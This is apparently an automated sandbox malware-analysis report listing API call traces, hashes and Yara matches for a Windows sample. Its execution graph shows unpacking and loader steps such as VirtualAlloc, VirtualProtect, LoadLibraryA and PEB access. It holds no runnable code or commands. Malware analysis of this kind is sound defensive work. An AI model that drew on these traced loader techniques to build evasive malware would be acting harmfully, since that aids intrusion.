                                                                                                                                                                                                                                        • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                        • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID: F(@
                                                                                                                                                                                                                                        • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                        • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                        • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0214E654: RtlEnterCriticalSection.NTDLL(01CD0DAF), ref: 0214E663
                                                                                                                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(@YV), ref: 021558F7
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02155905
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$DeleteEnter_free
                                                                                                                                                                                                                                        • String ID: @YV
                                                                                                                                                                                                                                        • API String ID: 1836352639-1722435086
                                                                                                                                                                                                                                        • Opcode ID: fa694aaca2794790394fd374aec7ec9cad519f71ffb8d99412d0c2b855f6b9e5
                                                                                                                                                                                                                                        • Instruction ID: 00884495a03759087080af55a5cb5371d6998c80c0ce5be2f61410990af76f24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa694aaca2794790394fd374aec7ec9cad519f71ffb8d99412d0c2b855f6b9e5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9511C831580324EFDB10DF98D885F5C77B1AF04326F6041A6E865DB2A1CB38E506CF08
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(0045A150,?,?,?,?,00457BD8,00000010,0042CA7A), ref: 00435690
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043569E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$DeleteEnter_free
                                                                                                                                                                                                                                        • String ID: @YV
                                                                                                                                                                                                                                        • API String ID: 1836352639-1722435086
                                                                                                                                                                                                                                        • Opcode ID: db160195e1fd4a8d749b4a78d4a01c3657d349e12daedf425722546a29bf1eef
                                                                                                                                                                                                                                        • Instruction ID: 52a1ea267b11448604aac72e837bb79cf4a64da9af37325288c97695b126f8a5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db160195e1fd4a8d749b4a78d4a01c3657d349e12daedf425722546a29bf1eef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E118E715003149FDB10DF99D882B5D77B0AB0832AFA1402BE855DB2A2CB78E8428F48
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                        • String ID: F(@$ios_base::failbit set
                                                                                                                                                                                                                                        • API String ID: 4194217158-1828034088
                                                                                                                                                                                                                                        • Opcode ID: 1a5c127bad98780cf7120583b0a686b34df283a21e54aace75fc879e8eb27ad0
                                                                                                                                                                                                                                        • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a5c127bad98780cf7120583b0a686b34df283a21e54aace75fc879e8eb27ad0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: H_prolog3_catch
                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                        • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                        • Opcode ID: c9eecc0e4369ac7dfaf8d6c6ba4700fb61a9f94c7fbf36bd6db8aa08719d0ee7
                                                                                                                                                                                                                                        • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9eecc0e4369ac7dfaf8d6c6ba4700fb61a9f94c7fbf36bd6db8aa08719d0ee7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                          • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                          • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                          • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                          • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID: F@
                                                                                                                                                                                                                                        • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                        • Opcode ID: 95af8a848c7b95c0b0710a03f208acb594888a6f497f0fa4d07e2459abf0159a
                                                                                                                                                                                                                                        • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95af8a848c7b95c0b0710a03f208acb594888a6f497f0fa4d07e2459abf0159a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                                                                                                                                                          • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                        • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                        • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                        • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                        • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02155895: RtlDeleteCriticalSection.NTDLL(@YV), ref: 021558F7
                                                                                                                                                                                                                                          • Part of subcall function 02155895: _free.LIBCMT ref: 02155905
                                                                                                                                                                                                                                          • Part of subcall function 021538D0: _free.LIBCMT ref: 021538F2
                                                                                                                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(@YV), ref: 0214CCFD
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0214CD11
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$CriticalDeleteSection
                                                                                                                                                                                                                                        • String ID: @YV
                                                                                                                                                                                                                                        • API String ID: 1906768660-1722435086
                                                                                                                                                                                                                                        • Opcode ID: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
                                                                                                                                                                                                                                        • Instruction ID: 78a1c9a78b32b91e819e805065d144d54c705654178ee64696508de2dc6b798a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87E0DF32C04324DFC7206B58FC88A4A3BF6AF89362B210476E818C3121CB20ED098F88
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0043562E: DeleteCriticalSection.KERNEL32(0045A150,?,?,?,?,00457BD8,00000010,0042CA7A), ref: 00435690
                                                                                                                                                                                                                                          • Part of subcall function 0043562E: _free.LIBCMT ref: 0043569E
                                                                                                                                                                                                                                          • Part of subcall function 00433669: _free.LIBCMT ref: 0043368B
                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(00565920), ref: 0042CA96
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0042CAAA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$CriticalDeleteSection
                                                                                                                                                                                                                                        • String ID: @YV
                                                                                                                                                                                                                                        • API String ID: 1906768660-1722435086
                                                                                                                                                                                                                                        • Opcode ID: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
                                                                                                                                                                                                                                        • Instruction ID: 096468770cdb8f5f473685e72dce597222f10a1d1bc444d33569d92b2b8518b1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1E012329107249FD621AF5EF885A5E7BB49B8D356B61443BF40592162CA24AD058B4C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                        • String ID: zB$~B
                                                                                                                                                                                                                                        • API String ID: 3275300208-395995950
                                                                                                                                                                                                                                        • Opcode ID: 34b3586ccf631747a2a280b867d5c1524efdb2f0c560e495eb6f5fdc2ae79a01
                                                                                                                                                                                                                                        • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34b3586ccf631747a2a280b867d5c1524efdb2f0c560e495eb6f5fdc2ae79a01
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                        • String ID: pThreadProxy
                                                                                                                                                                                                                                        • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                        • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                        • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CommandLine
                                                                                                                                                                                                                                        • String ID: %T
                                                                                                                                                                                                                                        • API String ID: 3253501508-1623511446
                                                                                                                                                                                                                                        • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                                                                                                                                                        • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02122AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02122AAD,00000000), ref: 0214B187
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0214B195
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02122AAD,00000000), ref: 0214B1F0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                                                                                        • Opcode ID: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                                                                                                                                                                                                        • Instruction ID: 5dd053a2bbf594accf8456329726cf29b7803091a22a3c12dd7dac360a2f8e50
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26411530E88206AFCF259F64D844BAE7BB5EF41718F154169EC5DA71A0DF30EA01CB60
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                                                                                        • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                        • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:1.7%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:43.8%
                                                                                                                                                                                                                                        Signature Coverage:10.9%
                                                                                                                                                                                                                                        Total number of Nodes:64
                                                                                                                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                                                                                                                        execution_graph 26422 43b068 26424 43b080 26422->26424 26423 43b16e 26426 43b23f 26423->26426 26429 43a9b0 LdrInitializeThunk 26423->26429 26424->26423 26428 43a9b0 LdrInitializeThunk 26424->26428 26428->26423 26429->26426 26430 40b44c 26434 40b45a 26430->26434 26435 40b57c 26430->26435 26431 40b65c 26433 43a950 2 API calls 26431->26433 26433->26435 26434->26431 26434->26435 26436 43a950 26434->26436 26437 43a976 26436->26437 26438 43a995 26436->26438 26439 43a968 26436->26439 26442 43a98a 26436->26442 26441 43a97b RtlReAllocateHeap 26437->26441 26443 438e70 26438->26443 26439->26437 26439->26438 26441->26442 26442->26431 26444 438e83 26443->26444 26445 438e94 26443->26445 26446 438e88 RtlFreeHeap 26444->26446 26445->26442 26446->26445 26447 43aecc 26449 43af00 26447->26449 26448 43af7e 26449->26448 26451 43a9b0 LdrInitializeThunk 26449->26451 26451->26448 26452 408790 26454 40879f 26452->26454 26453 408970 ExitProcess 26454->26453 26455 4087b4 GetCurrentProcessId GetCurrentThreadId 26454->26455 26458 40887a 26454->26458 26456 4087da 26455->26456 26457 4087de SHGetSpecialFolderPathW GetForegroundWindow 26455->26457 26456->26457 26457->26458 26458->26453 26459 438e51 RtlAllocateHeap 26460 43ab91 26461 43ab9a GetForegroundWindow 26460->26461 26462 43abad 26461->26462 26468 24b003c 26469 24b0049 26468->26469 26483 24b0e0f SetErrorMode SetErrorMode 26469->26483 26474 24b0265 26475 24b02ce VirtualProtect 26474->26475 26477 24b030b 26475->26477 26476 24b0439 VirtualFree 26481 24b05f4 LoadLibraryA 26476->26481 26482 24b04be 26476->26482 26477->26476 26478 24b04e3 LoadLibraryA 26478->26482 26480 24b08c7 26481->26480 26482->26478 26482->26481 26484 24b0223 26483->26484 26485 24b0d90 26484->26485 26486 24b0dad 26485->26486 26487 24b0dbb GetPEB 26486->26487 26488 24b0238 VirtualAlloc 26486->26488 26487->26488 26488->26474 26494 8d8af6 26495 8d8b05 26494->26495 26498 8d9296 26495->26498 26500 8d92b1 26498->26500 26499 8d92ba CreateToolhelp32Snapshot 26499->26500 26501 8d92d6 Module32First 26499->26501 26500->26499 26500->26501 26502 8d92e5 26501->26502 26504 8d8b0e 26501->26504 26505 8d8f55 26502->26505 26506 8d8f80 26505->26506 26507 8d8fc9 26506->26507 26508 8d8f91 VirtualAlloc 26506->26508 26507->26507 26508->26507

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4063528623-0
                                                                                                                                                                                                                                        • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                        • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 456 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: ihgf
                                                                                                                                                                                                                                        • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                        • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                        • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
